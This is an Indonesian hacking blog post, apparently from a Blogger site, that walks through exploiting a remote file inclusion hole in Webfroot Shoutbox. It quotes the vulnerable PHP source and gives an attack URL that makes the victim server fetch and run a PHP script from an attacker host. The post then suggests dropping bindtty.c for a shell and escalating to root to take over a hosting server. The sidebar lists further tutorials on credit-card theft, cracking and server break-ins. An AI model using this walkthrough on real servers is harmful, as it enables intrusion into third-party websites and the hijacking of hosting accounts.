TUTORIAL KOMPUTER
  • 10 Virus Komputer Paling Mematikan Di Dunia
  • Kunci Mempercepat Acces Komputer
  • MENGENAL SISTEM KOMPUTER
  • Sejarah Perkembangan Komputer
  • Informasi computer terkini
  • Mengenal System Software
  • Mengupas Masalah Motherboard
  • Mengupas Detail Tentang CPU
  • Kode Mempercepat Editing Paragraf
  • Memproteksi Folder Dengan Password
  • Macam-Macam Perintah Pada Run Commands
  • Mempercepat Waktu Shutdown
  • Ubah Tampilan Windows
  • Kode Akses Siemens
  • Kode Akses Samsung
  • Kode Akses Sony Ericsson
  • Kode Akses Nokia
  • Seni Photoshop ( Angan Merokok )
  • Menyembunyikan Menu Help Pada Start Menu
  • Menyembunyikan Menu Document Pada Start Menu
  • Menyembunyikan menu Find pada Start Menu
  • Mengembalikan Folder Documents Yang Hilang
  • Memproteksi File
  • Mengganti Icon Drive
  • Mengganti Alignment Pada Drop Down Menu
  • Disable Klik Kanan Pada Taskbar
  • Disable Klik Kanan Pada Dekstop & Explorer
  • Menyembunyikan Menu Start Menu
  • Persentasi Antara Flash Dan Power Point
  • Mengganti Screen Saver Lewat Registry
  • Menghilangkan Username Pada Start Menu
  • Menampilkan Administrator Di Welcome Screen
  • Menyembunyikan My Recent Documents
  • TUTORIAL HACKER
  • Bad Unicode
  • Cara Skip Win Registrasi XP
  • Craking Dengan F.A.R.A.B.I
  • DoS, Serangan yang Belum Tertangkal
  • Hack Dan Prinsip Dasar Psikologis Hack
  • Hacking NT Server Melalui Remote Data Service
  • 95% Web Server Di Dunia has been dead
  • Hacking Web Site with cart32.exe installed
  • Konsep Lain Menjebol Server Webfroot Shutbox
  • Istilah Teknologi Informasi Bahasa Indonesia
  • Mendapatkan account ISP gratis!
  • Mendapatkan Serial Number WinZip 8.1
  • Menghilangkan Password Bios
  • Mengintip Password Linux
  • Menjebol Apache Web Server Melalui Test-Cgi
  • Menjebol Server Melalui Service FTP
  • Pembobolan 1000 Kredit Card di Step-up
  • Penjebolan Server Melalui FTP
  • Hati-hati DLM Mengetikkan Klikbca.Com
  • VIRUS M HEART
  • Bongkar Password Microsoft Acces
  • BUG TELKOMSEL & (FREE Phone ke-CYPRUS
  • Cara Efisien Mendapatkan Puluhan Ribu Email
  • Cara Sederhana membuat virus PHP
  • Cara Singkat Menginfeksi Openssh-3.4p1 Z
  • Cracking GateKeeperm
  • HACKING FOR BEGINNER
  • Hack Windows NT2000XP Admin Password
  • Melewati pembatasan hak akses warnet
  • Melindungi Data dari SQL Injection
  • memainkan fungsi tombol HP
  • Membedah Teknik SQL Injection
  • Bongkar key Windows Dengan @ stake LC4
  • Meminimalkan Biaya Saat menelpon Di Wartel
  • Menangani Virus Lohan
  • MENGACAK-ACAK REGISTRY WARNET
  • Mengelabui Pengejar Hacker
  • Meng-Hack Pesawat Telepon Yang Terkunci
  • Meng-hack PHP-BUg's
  • Kelemahan pasword & login yahoo pd Cgi
  • Trik Penjebolan Sites
  • Ragam Hacking Menggunakan Google
  • Rahasia Teknik Serangan SQL Injenction
  • Teknik Pembuatan Virus Makro Pd XP
  • Seni Internet, Googlingg
  • Situs Hacker Yang Ikut Bermasalah
  • Teknik Hacking Situs KPU Dr segla arah
  • Teknik Menyusup Ke TNP Center KPU
  • Tip N Trik Telephon Gratis Musso
  • Trik Mereset Password Windows 9x
  • TUTORIAL BLOG
  • Menuliskan Script di Blog
  • Membuat Artikel Terkait/Berhubungan
  • Membuat Feed di Blog Dengan Javascript
  • Membuat Navigasi Breadcrumb di Blog
  • Membuat Meta Deskripsi di Halaman Blog
  • Membuat Readmore Versi 1
  • Membuat Read More Otomatis di Blog
  • Membuat Read More Versi 2
  • Membuat Tabs Menu Horizontal
  • Membuat Menu Tab View
  • Membuat Menu Vertikal
  • Cara Memasang Musik Pada Blog
  • Membuat Template Blog Hasil Buatan Sendiri
  • Buat Threaded Comment dgn Intense Debate
  • Membuat Menu DTree
  • Membuat Tab Menu Dengan Banyak Style
  • Menambah Toolbar Baru di Blogspot
  • Cara Membuat Tabel di Blog
  • Cara Membuat Tulisan Berjalan
  • Melakukan Backup Website atau Blog
  • Mendapatkan Free Hosting
  • Membuat Widget Status Twitter pada Blog
  • Manampilkan Profil Facebook di Website (blog)
  • Membuat Avatar Komentar Pada Blogger
  • Membuat Halaman Contact Me pada Blogspot
  • Cara Membuat Status Yahoo Messenger di Blog
  • Mendapatkan Layanan Google Friend Connect
  • Membuat Nomor Page Posting Di Blog
  • Tips dan Trik Menambah Kolom Di Blog
  • Mengatasi "Invalid Widget ID" pada Blogger
  • Membuat Slide Show Album Foto di Blog
  • Membuat Kotak Komentar dibawah Posting
  • Cara Membuat Kotak Link Exchange
  • Membuat Link Download
  • Cara Membuat Dropdown Menu
  • Cara Membuat Buku Tamu
  • Trik Memproteksi Blog
  • Cara Membuat Search Engine
  • Membuat Kategori / Label di Blogger
  • Menghilangkan Navbar (Navigation Bar)
  • Memasang Emoticon di Kotak Komentar
  • Menambah Emoticon di Shoutbox
  • Pasang Jam di Sidebar
  • Memasang Pelacak IP Address
  • Mengganti Tulisan "Older Post / Newer Post"
  • Memasang Alexa Traffic Rank
  • Memasang Tombol Google Buzz
  • Cara Membuat Cursor Animasi
  • Menyembuyikan Buku Tamu
  • 5 Cara Terbaik Mendapatkan Uang Dari Blog
  • Blogging Cepat Dengan BlogThis!
  • 21 Posts Separator Images
  • Mengganti Link Read More Dgn Gambar
  • Cara Menampilkan 10 Artikel Di Recent Posts
  • Offline Blogging Dgn Windows Live Writer
  • Cara Memasang Jadwal Sholat
  • Cara Membuat Daftar Isi Blog Otomatis
  • Membuat Daftar Isi Blog Manual
  • Iklan Google Adsense Di Tengah Artikel
  • Membuat Link Warna - Warni
  • Meletakkan Widget Di Bawah Header
  • Membuat Kotak Scrollbar
  • Memasang Video Di Artikel
  • Kode Warna HTML
  • Home » » Konsep Lain Menjebol Server Webfroot Shutbox

    Konsep Lain Menjebol Server Webfroot Shutbox

    pembahasan kali ini akan mengenai kelemahan pada shutbox.php dimana untuk exploit ini bisa dibaca pada url http://www.packetstormsecurity.nl/0305-exploits/shoutbox.txt

    Berawal dari seorang teman di mIRC yang menyodorkan ke gue untuk ngebuka :
    http://www.packetstormsecurity.nl/0305-exploits/shoutbox.txt
    tentang vurnabilitas pada shutbox.php dan untuk vurnabilitias ini bisa juga di baca di
    http://www.securiteam.com/unixfocus/5JP0W00A0U.html

    Ternyata paket yang vurnable itu adalah Webfroot Shoutbox versi 2.32 dan dibawahnya untuk lebih jelasnya tentang vurnabilitas ini bisa baca di kedua situs di atas gue males ngetiknya, cukup menarik (untuk saat ini gue suka banget sama bugs pada php-php portal karena kalo lo bisa nembusin hemm.. bukan cuma server kecil yang lo dapet tapi hostingan, manarik khan), pada kedua situs di di jelaskan kalo lo bisa Bad Request mengeksekusi perintah-perintah unix secara remote wow .. asikk... dan di kedua web diatas juga di terangkan gimana cara
    mengeksekusinya plus di kasih exploitnya yang di tulis di atas  bahasa perl, cuma gue ngak sreg sama exploit yang udah di kasih terlalu naif bagi gue karena kalo make exploit di atas
    lo kudu ngerti paling ngak cara cara script itu bekerja di atas bahasa perl kalo ngak lo bakal nemuin kendala yang nampak di shell lo setelah mengeksekusi exploit itu seperti di bawah ini :

    [x] Run command ...
    HTTP/1.1 400 Bad Request
    Date: Sat, 31 May 2003 06:28:18 GMT
    Server: Apache/2.0.45 (Unix) PHP/4.3.0
    Content-Length: 315
    Connection: close
    Content-Type: text/html; charset=iso-8859-1

    Request header field is missing ':' separator.


    <-= bah apa yang salah scriptnya apa gue nya yang dodolz perl .... make me horney he.he.he.he .. trus gue ngak bisa mentok kayak gini, berhubung dalam minggu-minggu ini gue udah sering berurusan sama php bugs pada situs situs php, gue coba bikin script sendiri dan gue download packet Webfroot Shoutbox versi 2.32, gue coba mahamin source dari shoutbox.php line per line : if (!isset($conf)) { $conf="shoutboxconf.php"; } else { # michel v was there $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting } 


    hemm jelas string $conf ngak cuma bisa di eksekusi di server nya sendiri, alias kita bisa maksa server itu buat ngebuka script laen di server laen, wow another bugs gue dapetin, ( I love PHP bugs) ok kita mulai, ini hasil riset gue sendiri, kalo lo mau bisa ikutin kalo ngak ya ngak usah, karena gue berfikir kalo exploit yang di kasih di kedua web diatas ngak cocok sama gue, dan malah bikin nyasar jauh dari hasil yang gue mau, untuk itu gue bikin riset kecil kecilan, cara gue mengexploit vurnabilitas di Webfroot Shoutbox : 
    1. gue bikin simple script php yang isinya ngak jauh dari kehebatan dari php itu sendiri yang bisa mengeksekusi system lewat browser ( system() [function.system]: )
    2. gue upload ke situs kesayangan gue dan gue beri nama cracxerfiles.php
    3. kemudian pada di browser kita jalankan scriptnya ( sudah tentu lo udah nyari situs korbanya, jgn nanya gue gimana nyari situsnya) hasilnya seperti ini
    : http://www.korban-neh.com/shoutbox/shoutbox.php?conf=http://www.cracxer-at-dalnet.org/cracxerfiles.php&cmd=id (http://www.korban-neh.com/shoutbox/shoutbox.php?conf <-= vurnabilitas di server korban) (http://www.cracxer-at-dalnet.org/cracxerfiles.php <-= attacker server disertai dengan php code nya) (&cmd=id <-= perintah yang akan di eksekusi di server korban) ##################################################################### #
    lo bisa liat print screen nya di http://www.pupet.net/cracxer.jpg # ##################################################################### 

    command id bisa lo ganti dengan command-command unix yang laen yang tersedia di server korban kalo lo punya sedikit kemauan berfikir lo pasti bisa ngedapetin root nya, seperti lo taro bindtty.c ke server korban , jalanin, kalo udah dapet akses shell ke server korban lo bisa local dan .. jreng .. sebuah server hosting menjadi milik lo perhatian : gue baru ngejajal di Webfroot Shoutbox versi 2.31, untuk versi yang laen gue ngak tau bisa apa ngak, jajal sendiri
    Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Creating Website

    0 komentar:

    Posting Komentar

     
    Support : Creating Website | Tutorq Template | Template
    Copyright © 2011. FAROUQ'S - All Rights Reserved
    Template Modify by Creating Website
    Proudly powered by Blogger